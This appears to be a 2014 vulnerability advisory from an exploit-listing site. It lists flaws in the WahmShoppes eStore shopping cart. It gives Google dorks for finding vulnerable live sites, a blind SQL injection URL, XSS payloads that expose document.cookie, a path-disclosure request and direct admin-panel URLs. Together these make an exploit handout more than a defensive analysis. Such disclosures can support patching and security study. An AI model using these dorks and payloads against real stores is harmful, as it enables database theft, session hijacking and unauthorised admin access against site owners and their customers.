WahmShoppes eStore Multiple Vulnerability

2014.06.06
Credit: alieye
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:WsError.asp

#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Title : multiple Vulnerability in "WahmShoppes eStore" # Author : alieye # vendor : http://www.wahmshoppes.com/ # Contact : cseye_ut@yahoo.com # Risk : High # Class: Remote # Google Dork: # inurl:WsError.asp # inurl:store/ We apologize but your request rendered no results # Version: all version # Date: 05/06/2014 #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1-Blind SQL Injection http://victim.com/store/WsDefault.asp?One=-999 AND 1=1+UNION+SELECT+...etc --------------------------------------------------------- 2-Cross Site Scripting http://victim.com/store/WsError.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://victim.com/store/WsRequestpwd.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E --------------------------------------------------------- 3-Information Disclosure in image location http://victim.com/store/thumb.asp?path=X:/server path and domain name/example.jpg --------------------------------------------------------- 4-show admin panel tools http://victim.com/store/frmLeft.asp --------------------------------------------------------- Admin page http://victim.com/store/admin/Default.asp #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #++++++++++++++++++++++++++++++++++++++++++++++++++++++++


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top